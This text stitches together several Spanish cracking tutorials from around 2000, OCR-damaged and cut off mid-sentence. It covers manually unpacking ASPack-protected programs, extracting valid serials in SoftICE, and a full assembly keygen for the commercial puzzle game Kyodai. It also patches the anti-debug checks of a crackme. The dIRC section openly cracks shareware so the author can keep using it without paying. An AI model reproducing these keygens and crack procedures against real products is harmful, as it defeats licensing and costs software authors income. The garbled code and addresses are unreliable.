a otra dirrecion la cual parece mas normal (499CD4 <-- Anota esta dirección!!!) . Bueno, vamos bien, ahora debemos 
volver a ese RET y tipear: A 59E501 y JMP EIP, [Esc] y despues ES. Joe!! ha salido del SICE y no ocurre nada!! Lo 
que en realidad ha pasado es que el programa ha sido cargado y desempacado y corrido en memoria gracias a ese JMP 
EIP que genera un bucle infinito que nos ayuda a desempacar el fichero :-) 


Lo que ahora hacemos es entrar de nuevo en el ProcDump y en la lista inicial vemos que aparece el path donde teneis 
instalado el kyodai, bueno eso es que el programa esta cargado en memoria asi que vamos a guardarlo, para ello lo 
seleccionamos con el boton derecho y seleccionamos "Dump (Full)" poniendo como name "kyo_Mr.exe" (por 
ejemplo) una vez guardado lo descargamos de la memoria con la opcion "Kill". Despues cargamos de nuevo con "PE 
Editor" el programa "Kyo_Mr.exe" (el cual esta ya desempacado) y observamos "Entry Point" e "Image Size". Lo que 
ahora debemos hacer es tomar la dirección a la que nos llevaba el ultimo RET: 499CD4 (recordad que os dije que la 
apuntarais) y el valor de "Image Size" y restarlo: 499CD4 - 400000 = 00099CDA. Esta ultima cifra debemos sutituirla 
por el "Entry Point" para que el programa desempacado pueda funcionar ya que si corrieramos el fichero sin hacer esto 
cada vez que lo corrieramos se quedaria cargado en memoria. 


Una vez desensamblado el fichero (siempre nos referiremos al desempacado Kyo_Mr.exe) corremos el fichero e 
introducimos los datos de nuevo: 


Nombre: Mr_Burns 
Serial: 1234567890 


Le damos a "REGISTRAR" y nos aparecera la ventanuca esa de que no estamos registrados. La recordamos. Corremos 
el Win32Dasm y desensamblamos el Kyo_Mr.exe que es el que esta desempacado. Buscamos en "Reference String" la 
cadena que tenemos (pero hemos de buscar la cadena en ingles, es decir, "Sorry, wrong password...". Le damos dos 
veces y aparecemos en 4648BC. Subimos un poco y vemos que hay un salto condicional en 464886, asi que vamonos 
para alla. Alli observamos que dos lineas mas arriba hay un call, la cual puede que sea la genere la password. Y 
podemos ver tambien que si no saltase alli nos apareceria otra cadena "Thanks again ! Your are now registered.". 
Nosotros no vamos a crear el parche sino el keygen por ello entraremos en la call para ver lo que hay... vemos una lista 
de "nosecuantos" nombres ¿? Que sera eso¿?! Bueno no nos interesa. Lo importante es lo del principio: 


* Referenced by a CALL at Addresses: 

1:0046487F , :0048664A , :0048C326 , :0048CBDE , :0048D575 
|:0048DE10, :0048E059 , :0048E626 , :0048F501 , :00490E32 
1:00495149 


:0047966C 55 push ebp 

:0047966D 8BEC mov ebp, esp 

:0047966F 6A00 push 00000000 

:00479671 53 push ebx 

:00479672 56 push esi 

:00479673 8BFO mov esi, eax 

:00479675 33C0 xor eax, eax 

:00479677 55 push ebp 

:00479678 680F9A4700 push 00479A0F <-- Guarda la lista de nombres que viene mas adelante en el codigo (ni idea 
de que es eso) 

:0047967D 64FF30 push dword ptr fs:[eax] 

:00479680 648920 mov dword ptr fs:[eax], esp 

:00479683 33DB xor ebx, ebx 

:00479685 8B864C2B0500 mov eax, dword ptr [esi+00052B4C] <-- Guarda en EAX mi nombre: Mr_Burns 
:0047968B EsD4A5F8FF call 00403C64 <-- Calcula la longitud del nombre y la compara con 8 (creo) 
:00479690 85C0 test eax, eax 

:00479692 0F8E0C030000 jle 004799A4 <-- Si no posee 8 caracteres salta a error 

:00479698 8D4DFC lea ecx, dword ptr [ebp-04] 

:0047969B 8B964C2B0500 mov edx, dword ptr [esi+00052B4C] <-- Guarda en EDX mi nombre: Mr_Burns 
:004796A1 8BC6 mov eax, esi 


:004796AB 8B96502B0500 mov edx, dword ptr [esi+00052B50] <-- Guarda en EDX el serial que yo introduje: 12345 
:004796B1 ESBEA6F8FF call 00403D74 <-- Compara EAX con EDX 

:004796B6 0F85E8020000 jne 00479944 <- Si no son iguales salta a error 

:004796BC 8B864C2B0500 mov eax, dword ptr [esi+00052B4C] 


Como podemos comprobar, encontrar el serial correcto es cosa de niños xDDD. Por si os habeis perdido, en 4796A8 
esta el serial ccorrecto, lo unico que debeis hacer es d eax y os aparecera el serial. Como esto me resulto demasiado 
facil quise hacer el Ke YgEn ya que descbri la rutina que genera el serial, asi que apor ella: 


* Referenced by a CALL at Address: 
1:004796A3 


:00474B08 55 push ebp 

:00474B09 8BEC mov ebp, esp 

:00474BOB 83C4F4 add esp, FFFFFFF4 

:00474B0E 53 push ebx 

:00474BOF 56 push esi 

:00474B10 57 push edi 

:00474B 11 33DB xor ebx, ebx 

:00474B13 895DF4 mov dword ptr [ebp-0C], ebx 

:00474B 16 8BF9 mov edi, ecx 

:00474B 18 8955F8 mov dword ptr [ebp-08], edx 

:00474B1B 8945FC mov dword ptr [ebp-04], eax 

:00474B1E 8B45F8 mov eax, dword ptr [ebp-08] 

:00474B21 ESF2F2F8FF call 00403E18 

:00474B26 33C0 xor eax, eax 

:00474B28 55 push ebp 

:00474B29 68E34B4700 push 00474BE3 

:00474B2E 64FF30 push dword ptr fs:[eax] 

:00474B31 648920 mov dword ptr fs:[eax], esp 

:00474B34 8B45F8 mov eax, dword ptr [ebp-08] 

:00474B37 Es28F1F8FF call 00403C64 <-- Todo lo de arriba no es importante para el Ke YgEn 
:00474B3C 8B55F8 mov edx, dword ptr [ebp-08] <-- EDX = Nombre (Mr_Burns) 
:00474B3F 0FB64402FF movzx eax, byte ptr [edx+eax-01] <-- EAX = Ultima letra de nuestro nombre (s) 
:00474B44 8B55F8 mov edx, dword ptr [ebp-08] <-- EDX = Nombre 

:00474B47 0FB612 movzx edx, byte ptr [edx] <-- EDX = Primera letra del nombre (M) 
:00474B4A 03C2 add eax, edx <-- EAX + EDX = EAX 


:00474B4C B90A000000 mov ecx, 00DO0000A <-- ECX = 10 

:00474B51 99 cdq <-- NPI (Ni Puta Idea!, pero nos da igual nos nos hace falta) 
:00474B52 F7F9 idiv ecx <-- Divide con signo EAX / ECX y el resto queda en EDX 
:00474B54 83C230 add edx, 00000030 <-- Añade a EDX (resto) 30h 


:00474B57 8BC7 mov eax, edi 

:00474B59 ES2EFOFSFF call 00403B8C 

:00474B5E 8B45F8 mov eax, dword ptr [ebp-08] <-- EAX = Nombre 

:00474B61 ESFEFOFS8FF call 00403C64 <-- Calcula la longitud del nombre 

:00474B66 8BF0 mov esi, eax <-- ESI = La longitud del nombre (8) 

:00474B68 83EE02 sub esi, 00000002 <-- Le resta 2 (esto es porque los dos primeros bytes contienen datos de la 
meoria reservada) 

:00474B6B 7C39 jl 00474BA6 <-- Si es menor salta a error 

:00474B6D 46 inc esi <-- Sino, incrementa ESI 

:00474B6E BB02000000 mov ebx, 00000002 <-- EBX = 2 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00474BA4(C) 


:00474B73 8B45F8 mov eax, dword ptr [ebp-08] <-- EAX = Nombre 

:00474B76 0FB64418FE movzx eax, byte ptr [eax+ebx-02] <-- EAX = Primera letra del nombre (M) 
:00474B7B 8B55F8 mov edx, dword ptr [ebp-08] <-- EDX = Nombre 

:00474B7E 0FB6541AFF movzx edx, byte ptr [edx+ebx-01] <-- EDX = Siguiente letra del nombre (1) 


Hagamos aqui una pausa para indicaros la "inteligencia" del programador: observad que en 474B6E EBX = 2 y que en 
474B76 a EBX le resta 2. Y despues, en 474B7B le resta 1. Esto es una autentica estupidez ya que se podia haber 
ahorrado tantas molestias poniendo: 


474B6E EBX = 0 


474B76 movzx eax, byte ptr [eax+ebx] 


474B7B movzx edx, byte ptr [edx+ebx+01] 


:00474B83 03C2 add eax, edx <-- EAX = EAX + EDX 


:00474B85 B90A000000 mov ecx, 0000000A <-- ECX = 10 

:00474B8A 99 cdq <-- NPI 

:00474B8B F7E9 idiv ecx <-- Divide con signo EAX / ECX y el resto queda en EDX 
:00474B8D 83C230 add edx, 00000030 <-- EDX + 30h 


:00474B90 8D45F4 lea eax, dword ptr [ebp-0C] 

:00474B93 ESF4EFF8FF call 00403B8C 

:00474B98 8B55F4 mov edx, dword ptr [ebp-0C] 

:00474B9B 8BC7 mov eax, edi 

:00474B9D ESCAFOFS8FF call 00403C6C 

:00474BA2 43 inc ebx <-- Incrementa EBX en 1 

:00474BA3 4E dec esi <-- Y decrementa ESI en 1 

:00474B A4 75CD jne 00474B73 <-- Si son diferentes salta (BUCLE!) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00474B6B(C) 


:00474BA6 8B45F8 mov eax, dword ptr [ebp-08] <-- EAX = Nombre 
:00474BA9 ESB6FOFSFF call 00403C64 <-- Calcula la longitud del nombre 
:00474B AE 83F808 cmp eax, 00000008 <-- La compara con 8 

:00474BB1 7D15 jge 00474BC8 <-- Si es mayor o igual bien 

:00474BB3 8BCF mov ecx, edi <-- Sino.... ERROR!!! 

:00474BB5 8B45FC mov eax, dword ptr [ebp-04] 

:00474BB8 8B80DC050000 mov eax, dword ptr [eax+000005DC] 


Despues de haber estudiado la rutina que genera el serial no damos cuenta de que extremadamente simple!!!! :-D 
Veamos: El primer byte contiene la suma de la primera y ultima letras del nombre; y el resto es la suma de un letra con 
la siguiente. como os habia dicho extremadamente simple!!! 


Me gustaria decir que el codigo que hay entre 474B4C-474B54 y 474B85-474B8D no tiene nada que ver con la 
generacion del serial. Lo que quiero decir es que esta parte del codigo, las cuales son iguales, lo unico que hacen es 
convertir el resultado de la suma en un numero decimal. Lo pillais¿? Bueno os lo explicare mas adelante :-) 


Ahora que sabemos como funciona la rutina de generacion del serial, empezemos el Ke YgEn. Yo como el lenguaje 
que mas controlo es Ensamblador, lo voy a hacer en este lenguaje, pero no descarteis hacerlo en cualquier otro, tan 
solo hace falta un poco de imaginacion e ingenio :-) 


Aqui os presento el codigo, el cual ire comantando para aquellos que no esten muy metidos en la materia: 
¡Kyodai 10.21 Ke YgEn 


¡CoDeD bY Mr Burns 
¡DaTe: 22-09-2000 


.MODEL SMALL ; Indica que el ejecutable va a ser un COM 

.CODE ;¡Segemnto del codigo 

.386 ¡Funcones de 386 

ORG 100h ;Desplazamiento 100h=256d respecto al origen del segmento 


Start: ¡mp LetsRock ;Saltamos al codigo, dejamos los datos a un lado 


Intro db 10,13,'Kyodai 10.xx Ke YgEn CoPYaLL 2000 CoDeD bY Mr Burns',10,13 
db 10,13'eNTeR YouR NaMe: $' 

NameOut db 20,0 

Name2 db 20 DUP(0) 

SerialOut db 10,13,'THe PaSSWOoRD iS: ' 

Pass db 20 DUP(O) 

EndPass db 10,13,'$' 

TempPass db 20 DUP(0) 

TempPassEnd db 0 

NoName db "***eRRoR*** THe NaMe MusT Be MoRe THaN 8 LeTTeRS :(,10,13, '$' 
Pass2 db 20 DUP(0) 

SizeName db 0 


LetsRock: 

mov ah,09h ¡Escribe texto por pantalla 
lea dx, Intro 

int 21h 


mov ah,0Ah ¡Recoge el Nombre 
lea dx,NameQut 
int 21h 


LongName: 

mov al,byte ptr [NameOut+1] ¡AL = Long del Nombre 
cmp al,8 ¿Lo compara con 8 

jge CalculateSerial ¿Si es MAyor o Igual salta 


BadName: 

mov ah,09h ;Sino hay un error 
lea dx,NoName 

int 21h 


mov ah,4Ch ;Y sale del programa 
int 21h 


CalculateSerial: 

xor eax,eax ¡Limpia los registros 
xor ebx,ebx 

XOr €CX,ecx 

xor edx,edx 


mov al,byte ptr [NameOut+1] ¡AL = Longitud del nombre 
mov byte ptr [SizeName],al ;SizeName = AL 


lea esi,Name2 ¡EST apunta al nombre 
lea edi,Pass2 ¡EDI apunta al serial 


movzx ebx,byte ptr [SizeName] ¡EBX = SizeName = AL X-D 
mov al,byte ptr [esi+ebx-1] ¡AL = Ultima letra del nombre 
mov cl,byte ptr [esi] ¡CL = Primera letra del nombre 

add eax,ecx ¿Se suman y se guarda en EAX 

mov ecx,DAh ¡ECX = 10 

xor edx,edx ¡EDX =0 

idiv ecx ¡Divide EAX / ECX y el resto queda en EDX 


add d1,30h ¡AKMade al resto 48 
mov byte ptr [edi],dl ¡Lo mete en la pass 
inc edi ¡Incrementa el puntero del pass en 1 


xor ebx,ebx ¡EBX = 0 
xor eax,eax ¡EAX =0 
xor edx,edx ¡EDX =0 


SecondPart: 

mov al,byte ptr [esi+ebx] ¡AL = Primera letra del nombre 
mov dl,byte ptr [esi+ebx+1] ¡DL = Segunda letra del nombre 
cmp dl,0 ;“El nombre se acaba? 

je TheEnd ;Si = Escribirlo por pantalla 

add eax,edx ¡NO = Se suman y se guarda en EAX 

mov ecx,DAh ¡ECX = 10 

xor edx,edx ¡EDX =0 

idiv ecx ¡Divide EAX / ECX y el resto queda en EDX 
add dl,30h ¡¿AKíade al resto 48 

mov byte ptr [edi+ebx],dl ¡Mueve el resto al serial 

inc ebx ¡Incrementa EBX 

jmp SecondPart ¡Salta al comienzo (Bucle) 


TheEnd: 
mov byte ptr [edi+ebx-1],0 ¡Poner un O (binario) al final del serial 


lea esi,Pass2 ;ESI apunta al pass 
lea edi,Pass ¡EDI apunta donde va a ir el pass 


Serial: 

movsb ¿Mover de ESI a EDI byte a byte 

cmp byte ptr [esi],00h ¡Comparar el pass con O 
jne Serial ;si no lo es continua (Bucle) 


Print: 

mov ah,09h ;Saca el Serial por pantalla 
lea dx,SerialOut 

int 21h 


mov ah,4Ch ¡Sale del programa 
int 21h 


; end Start ¡Terminamos el Ke YgEn :) 


DESPEDIDAS Y DEMAS :-( 


Bueno, esto hay sido todo. espero que os halla servido de ayuda este tutorial para saber un poquito mas de cracking ;-) 
Se que este Ke YgEn puede ser mejorado, si crees que tu puedes hacerlo mejor... ADELANTE!!!! te animo a que lo 
hagas mejor y me lo comentes (y no me lo restriegues por la cara :-] ) 


Me he dado cuanta de el gran tamaño de este tutorial pero creo que en necesario ya que he intentado explicar un poco 
las causas y el porqué de todos los pasos que he realizado ya que es asi como me gustaria encontrame un tutorial a mi :- 


) 


Como siempre digo en mis tutoriales, si deseais hablar conmigo buscad en: 


NiCK SeRViDoR CaNaL 
Mr_Burns irc.irc-hispano.org CRaCKeRS 
[MoRDReD] irc.chat.org TnTCRaCKeRS £ WkT 


O por el contrario si tan solo deseas mandarme un e-mail: mr_burnsC go.to 


Pues eso ha sido todo.... pero antes quiero saludar a toda la gente que se dedica a este campo del "Andergraund" 
(Underground), a toda la gente del IRC y del canal +Palencia (que es donde yo vivo!!!!) y al canal ACRaCKeRS, 
especialmente a: [The_Pope], Shotgan, BiIRKiN, SeRoCuLTo, JoTaKe, Ni2, [Aura, Sirvenom, [Xasx], Xasx [out], 
[XasxZzZzZ] etc etc etc (xDDDDDDDDD)..... y que no quede nuestro nuevo BoT MOVSB (creado por Shotty, que ha 
realizado un gran trabajo ;-)) 
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http://Kickme.to/tnt 


introduccion 


bueno, comenzamos, primero le pasamos el gettype al archivo en cuestión, y nos informa de que está 
comprimido con aspack. 


vale, si intentamos descomprimirlo (con procdump por ejemplo), nos saldrá un aviso de que se detecta un debugger. no 
pasa nada. 

iniciamos el sice, y vemos, que no nos rompe. bueno, abrimos procdump, pinchamos en pe-editor, 

y editamos la 1* sección (code), y le ponemos lo de siempre e0000020. y ahora si nos romperá el sice. 


bien, ponemos ctrl+d. y ponemos alguna clave, la que se nos ocurra. y antes de pulsar el botón de verificar, pulsamos 
ctrl+d. y ponemos en el sice lo siguiente 'bpx hmemcpy'. y otra vez ctrl+d. 


ahora si pulsamos el botón, y nos romperá el sice. pulsamos f12 varias veces hasta llegar al programa en sí (unas 10 
veces + 0 -). y comenzamos a tracear el programa con f10. pero ojo, hasta encontrarnos un call. si pulsamos £10 en ese 
call, nos saldrá el famoso mensaje de 'that's not quite right', y tendremos que volver a empezar. entonces el meollo del 
asunto está en ese call, que traceamos con f8. vamos traceando hasta encontrarnos una comparación: 


cmp byte ptr [ecx], 57 
|$Z XXXXXXX 
¡mp mensaje txungo 


bien, nos situamos en el cmp, y ponemos 'd ecx', y nos tiene que aparecer, la primera letra de lo que hayamos puesto. 
que precisamente la compara con una w(57), que seguro que nosotros no hemos puesto. pues bien, llegamos al jz, y 
podemos editar el flag z, para que salte donde queremos. lo hacemos, y seguimos. 


pero al poco rato, vuelve a aparecer algo parecido. y si hacemos lo mismo, nos compara la 2* letra con una w(57) otra 
vez. si seguimos haciendo lo mismo (con mucha paciencia), y vamos apuntando las posiciones de las letras, y con que 
las compara, podemos sacar lo siguiente: 


la clave debe tener una w en las posiciones 1,2,8,11. una m, en la posición 3. y una k en la posición 5. el resto, lo pones 
como quieras. 


algo así: 


wwm*k**y**y 
donde pone * pon lo que quieras. 


así, se puede hacer un keygen, poniendo letras aleatorias en los *. 
:-d 


txotxo 
visit my web: www.geocities.com/ttxotxo 
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SoftlIce, ProcDump 


os saludo de nuevo a todos de nuevo en este nuevo tutorial sobre cracking. esta vez he decidido hacer un 
tutorial de un nivel superior al anterior ya que este programa (el dirc v1.2 para los despistados ;-)) esta 
empacado con el famoso compresor aspack. espero que este tutorial os aclare un poco más la ideas sobre los 
programas empacados :-) 


despues de tanto rollo creo que deberiamos ir a por él 


para empezar instalamos el programa con tranquilidad sabiendo que es shareware y que nos pedira una puta clave :-) 


una vez instalado abrimos el programa y lo estudiamos un poco (joder!! que buena pinta tiene el condenado es chulo!!! 
habra que probarlo en vez del mirc) y miramos en el menu: help/purchase... y observamos que nos pide el nombre, 
compañía y número de serie. bueno pues vamos a introducir los datos: 


nombre: mr_burns 
company: mordred 
serial: 1234567890 


le damos al "ok" y.... ¿? pero si no pasa nada!!! volvemos al menu help/about dirc y nos pone algo asi como que no 


estamos registrados y que nos quedan 29 dias de disfrute del programa. "caguen...” pues a mi me ha molado mazo y me 
lo quiero quedar asi que lo voy a crackear!! 


empezare metiendole mano con el win32dasm y... joe!! que se me ha colgado!! bueno no pasa nada lo voy a cargar en 
el loader sel sofice (sice) y... pues tp tira!!! pufff!! esto me hace sospechar que este programa esta empakado!!! 


bueno para ello usare mi querido procdump. entro en el pe editor y abro el dirc.exe, entro en sections y observo dos 
cosas: 


1? en .text (caracteristics) aparece c0000040. eso significa que el programa no es ejecutable!!! y que yo sepa deberia 
tenet e0000020 (ejecutable). bueno, pues eso, lo cambiamos. 


2” aparece una cadena por ahi que pone aspack. eso a mi me suena a compresor!! 


despues de esto lo que voy a hacer es descomprimir el programa con el aspack, la ultima version porque este programa 
es nuevo, y... no tira!!! eso quiere decir que no tenemos esa version. lo que significa que habra que hacerlo a mano 
(ejeje esto se pone interesante asi que me voy a por una copilla :-)) 


corremos el loader del sice y vemos que ahora si! que tiras esas ruletitas :-) entramos y vemos que la direccion es un 
poco rara (5a1001) y observamos: 


pushad 
call OOXxxxxx 
¡mp OOXxxxxx 


[...] 
popad 


esta es una tipica estructura de un fichero empacado y/ó encriptado. lo que nosotros estamos buscando es popad ya que 
despues de eso el programa ya esta desempacado. asi que adelante, a tipear £10 como cerdos hasta encontrarlo (lo que 
yo os aconsejo es que cuando veais un salto que os lleve hacia arriba introduzcais "g address siguiente al salto" para 
que no tengais que tragaros todos los bucles que hay). despues de muchos cuelgues del sice y de muchos f10 
encontramos un popad en la dirección 5a14f3. lo que ahora haremos es s 5a1413 1 ffffff 61 (61 = popad en 
hexadecimal) y apretamos f5. si sales del sice y entras en el programa aleluya!!! la instruccion encontrada es la 
correcta, en caso contrario, deberas buscar otro popad y realizar la misma operacion :-( 


bueno coninuamos y vemos que despues de varios tipeos de £10 aparece un ret en 5a1503 y que ese ret nos lleva a otra 
dirrecion la cual parece mas normal (4b0332 <-- anota esta dirección!!!) . bueno, vamos bien, ahora debemos volver a 
ese ret y tipear: a 521503 y ¡mp eip y despues f5. joe!! ha salido del sice y no ocurre nada!! lo que en realidad ha 
pasado es que el programa ha sido cargado y desempacado y corrido en memoria gracias a ese jmp eip que genera un 
bucle infinito que nos ayuda a desempacar el fichero :-) 


lo que ahora hacemos es entrar de nuevo en el procdump y en la lista inicial vemos que aparece el path donde teneis 
instalado el dirc, bueno eso es que el programa esta cargado en memoria asi que vamos aguardarlo, para ello lo 
seleccionamos con el boton derecho y seleccionamos "dump (full)" poniendo como name "dirc_mr.exe" (por 


ejemplo)una vez guardado lo descargamos de la memoria con la opcion "kill". despues cargamos de nuevo con "pe 
editor" el programa "dirc_mr.exe" (el cual esta ya desempacado) y observamos "entry point" e "image size". lo que 
ahora debemos hacer es tomar la dirección a la que nos llevaba el ultimo ret: 460332 (recordad que os dije que la 
apuntarais) y el valor de "image size" y restarlo: 460332 - 400000 = 000b0332. esta ultima cifra debemos sutituirla por 
el "entry point" para que el programa desempacado pueda funcionar ya que si corrieramos el fichero sin hacer esto 
cada vez que lo corrieramos se quedaria cargado en memoria. 


una vez desensamblado el fichero (siempre nos referiremos al desempacado dirc_mr.exe) corremos el fichero e 
introducimos los datos de nuevo: 


nombre: mr_burns 


company: mordred 


serial: 1234567890 


antes de apretar ok entramos en el sice (control + d) y situamos un bDpx getwindowtekxt a, salimos, le 
damos al ok y ... boommm! saltamos al sice. una vez en el sice hemos de apretar f5 2 veces ya que el bpx es para 
detectar la lectura de texto en un textobox y en este caso habia tres (nombre, compañia y serial). despues de eso 
salimos de unos cuantos call hasta legar a 463905 donde veremos: 


:00463900 e8d1330600 call 004c6cd6 <-- llamada a la que llegamos 

:00463905 68e8030000 push 000003e8 

:0046390a ff15a0c25000 call dword ptr [0050c2a0] <-- llamada de sleep (la verdad es que npi de para que lo hace!!!) 
:00463910 8b8624010000 mov eax, dword ptr [esi+00000124] <-- mueve a eax el nombre 
:00463916 8dbe24010000 lea edi, dword ptr [esi+00000124] 

:0046391c 6860dd5400 push 0054dd60 

:00463921 50 push eax <-- lo guarda 

:00463922 e8f£7bd0400 call 004af71e<-- comprueba la longitud (creo) 

:00463927 830408 add esp, 00000008 

:0046392a 85c0 test eax, eax <-- testea el nombre 

:0046392c 7418 je 00463946 <-- si es cero da error 

:0046392e 8b861c010000 mov eax, dword ptr [esi+0000011c] <-- introduce en eax el serial invalido 
:00463934 6860dd5400 push 0054dd60 

:00463939 50 push eax <-- lo guarda 

:0046393a esdfbd0400 call 004af7 le 

:0046393f 830408 add esp, 00000008 

:00463942 85Cc0 test eax, eax <-- testea el serial invalido 

:00463944 7509 ¡ne 0046394f <-- si no es igual salta 


* referenced by a (u)nconditional or (c)onditional jump at address: 
[:00463944(c) 


:0046394f 8b07 mov eax, dword ptr [edi] <-- mueve a eax el nombre 

:00463951 50 push eax <-- lo guarda 

:00463952 8d442418 lea eax, dword ptr [esp+18] 

:00463956 50 push eax 

:00463957 es34c4feff call 0044fd90 <-- llamada que genera el serial! 

:0046395c 8b8e1c010000 mov ecx, dword ptr [esi+0000011c] <-- mueve a ecx el serial invalido 
:00463962 8b00 mov eax, dword ptr [eax] <-- mueve a eax el serial 

:00463964 8dae1c010000 lea ebp, dword ptr [esi+0000011c] <-- ya no digo mas porque no nos interesa :-) 
:0046396a 51 push ecx 

:0046396b 50 push eax 


cuando lleguemos a la direccion 463962 introducimos d eax y... tachan!!! en la parte superior izquierda tenemos un 
numero con guiones que parece un serial!!! 


bueno pues lo probamos y nos aparece una "inocente" ventanita diciendo "thank you for purchasing dirc!" y ala yas ta 
registrado el programilla para nuestro disfrute xddddd 


despedidas y demas :-( 


espero que os haya servido de gran ayuda este tutorial. la mayoria de los programas enpacados con el aspack se puedes 
"petar" de esta manera pero eso ya lo ireis averiguando vosotros a lo largo del tiempo ;-) 


si encontrais algun problema en el tutorial fallo gordo etc por favor hacedmelo saber y sera corregido. 


si por algun casual quereis hablar conmigo, podeis encontrarme en: 


hispano: *crackers HHingenieria_inversa con el nick de "mr_burns" 
efnet: tHintcrackers Hwkt con el nick de "[mordred]" 


hasta el siguiente tutorial!!! 
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Programa: Krackme KeyFile 
PROTECCION: (1)- Empaketado.(2)- Rutinas antidebugging.(3)- Protección keyFile. 
Objetivo: Hacer un Keygen, Simular estar registrados, etc. 
Descripcion: Tal tal tal 

Dificultad: 222927 

DOWNLOAD: 22722??? 

Herramientas: - ProcDump.- Softlce.- W32Dasm.- Heditor Hexadecimal. 

CRACKER: Nopper FECHA: 14/7/2000 


introduccion 


buenaz, soy nopper, y este es mi tuto sobre el crackme keyfile hecho por +dza kraker de tnt! publicado 
el 14 de julio del 2000. si habeis leido la info k viene con el tuto sabreis k es un crackme de nivel newbie 
( acorde con mi skill, sea dicho de paso ), asi k si buscais un pedazo de tuto no os leais esto. 


bueno, empecemos, vamos a rajar a nuestra victima en canal para poder examinarlo mejor, asi k 
preparad vuestros guantes de latex, vuestras mascarillas de cirujano loco y vuestra musica preferida 
para pasar un buen rato de disección digital xd. 


al atake 


(1)-<< empaketado >> 
bueno, el desempaketado lo voy a hacer manualmente pork: 1?) el gettype no me chutaba bien con este crackme ( no se 
pork ) 2”) por k me gusta hacerlo así y 39) pork es mas didáctico ( no podemos estar a espensas de esperar a k salga el 
desempaketador de nuestra victima ). 
ok, primero nos vamos a nuestro procdump y editamos las secciones de código con el atributo e0d000020, estas suelen 
ser nombradas como .code, .text y también la sección de código del propio cargador, en este caso aspack, en caso de 
duda o de k todas las secciones lleven nombres iguales, pues aplicale el atributo a todas las secciones. este atributo 
permite k las secciones sean editables, asi nuestro softice podrá romper inicialmente en la primera de línea de código, de 
no ser asi, no romperá y el programa se ejecutará del tirón. 
ahora vayamos a nuestro sice y ejecutemos a la victima, aterrizamos en la primera línea de código del cargador k es un 
pushad, bien esto es tipico de todos los cargadores, la estructura típica de un cargador es: 
pushad ( empuja todo los registros de proposito general ) 
call xxxxxx ( algoritmo de deskompresión ) 
popad ( recupera todos los registros de proposito general ) 
ret o ¡mp ( salto hacia la primera linea de código del programa desempaketado ) 


pues lo interesante ahora es buscar un trozo de código del tipo popad seguido de un ret o jump. 
pero no empeceis a buscar ahora, pork el propio cargador esta encriptado, asi k empezar a darle a f8/£10 durante unos 
segundos para k de tiempo a la desencripatación, id de vez en cuando mirando desde el final del cargador hacia arriba 
hasta buscar algo interesante. nota: seguro k estais pensando lo poco elegante, poco estricto e intuitivo del sistema, pero 
creedme, es tan solo cuestión de practicar, cuando lleveis unos cuantos desempaketamientos manuales vereis las cosas 
al vuelo y no tardareis mas de 3 minutos en sacarlo. 
bueno si habeis mirado un poco por ahi vereis k en la linea 40626f aparece un popad y despues un jmp k dan bastante el 
cante. si seguiis traceando vereis k salta a 401000, bien! ese es el comienzo del programa, ya desempaketado. 
arrankemos otra vez el sice, y pongamos un break en 40626f cuando este esté desencriptado. ahora ensamblemos: a eip, 
y poned jmp eip, esto se hace para k el programa kede en un bucle infinito y nos permita volcar el programa de una 
forma limpia y sin errores, ahora id al procdump y en la sección task dumpear el programa (botón derecho-dump/full). 
ahora cambiemos el punto de entrada para k nuestro volcado empiece correctamente esto lo conseguimos restandole a 
401000 (inicio del programa ya desempaketado) a la base, en este caso 400000, esto es igual a 1000, y ya está, lo 
tenemos!!!. 


PE Structure Editor 


— Header Infos — Structures Editor OK 
Entry Point : [00001 000 Sections | Directory 


Apply changes method: 
(Only to PE header 


Size of image : [0000FODO 
C TOPE file Cancel | 


Image Base : [00400000 


nota :si teneis algun problema o no entendeis algo recomiendo leer los documentos genericos de mr.orange y mr.blue 
sobre desempaketamiento manual k podreis encontrar en el ecd. 


(2)-<< antidebug >> 
bueno, de entrada decir k aunke useis frogsice nos va a detectar el sice, asi k kojamos y hagamos un listado muerto de 
nuestra victima con nuestro w32dasm. si echais un vistazo a las strings references veremos 2 frases muy interesantes: " 
a debugger has been detected, quiting" y "numega softice detected, quiting", bueno pues estas frases son volcadas a 
pantalla con messagebox y por encima de estos messagebox aparecen de forma clara y sin ningun tipo de complicación 
alguna los saltos condicionales k controlan su ejecución: 


2004013D3 5E pop esi 
:004013D4 5F pop edi 
:004013D5 59 pop ecx 
:004013D6 EBE4 jmp 004013BC 


* Referenced by a (U)nconditional or (C)jonditional Jump at Addresses: 
|:004013D1(Cj, :00401432 (0) 


| 
:004013D8 6400 push 00000000 


* Possible StringData Ref from Data 0b3j --"bad dude" 
| 
:004013DA 6861214000 push 00402161 


* Possible StringData Ref from Data 0bj ->"Numega Softice Detected, quiting" 
| 
:004013DF 683B204000 push 0040203B 


bien pues fácil, no? capamos el salto con un par de nop y resuelto, así llegaremos al salto incondicional y nos libraremos 
de ese mensajito k tanto nos da por culo. 


:004013FA 6A00 push 00000000 


* Possible StringData Ref from Data 0bj ->"bad dude" 


l 
:004013FC 6861214000 push 00402161 


* Possible StringData Ref from Data 0bj ->"A debugger has been detected, quiting" 
| 


:00401401 68FD214000 push 004021FD 

:00401406 6400 push 00000000 

:00401408 ES?A4010000 call 00401587 

:0040140D E295C010000 jmp 0040156E 

* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
|:004013F8(C) 

| 

:00401412 B812234000 mov eax, 00402312 


con este tampoco hay problem no? forzamos el salto con un jmp y punto. 
todavía nos keda un tercero k se encuentra en la linea 401430 el cual es posterior a un call k llama al registro para 
buscar rastros de nuestro amado sice, asi k con este también lo forzamos a un incondicinal con un ¡mp y terminado. 


(3)-<< keyfile >> 
bueno ahora comienza las comprobaciones de existencia del keyfile, reserva de memoria para su lectura y posterior 
comprobación con un bloke de bytes k el crackme guarda por algun lado. 
de entrada si ejecutamos nuestro programa con lo k llevamos hecho nos saldra un mensaje del tipo:"where the hell is my 
keyfile?", es decir, no encuentra el archivo por ningun lado y nos lo echa en cara. buenos si os fijais este mensaje viene 
de un salto q es posterior a una llamada a la api openfile, si os fijais en el parametro k se le pasa como path, esta es 
"cicrackme.lic", linea 401476 push 40202c. pues nada si él kiere un archivo llamado así en cl nosotros no vamos a 
impedirselo, no? cojamos el editor del dos y creemos uno. 
posteriormente veremos algunas apis relacionadas con la reserva de memoria, comprobando si nuestro crackme no esta 
vacio, es decir contiene al menos 1 byte, sino mostrará el siguiente error por pantalla "memory alloc error, quiting." 
pues rellenemos con algo de basura nuestro crackme ficticio y problem resuelto. ahora si seguimos tracenado se nos 
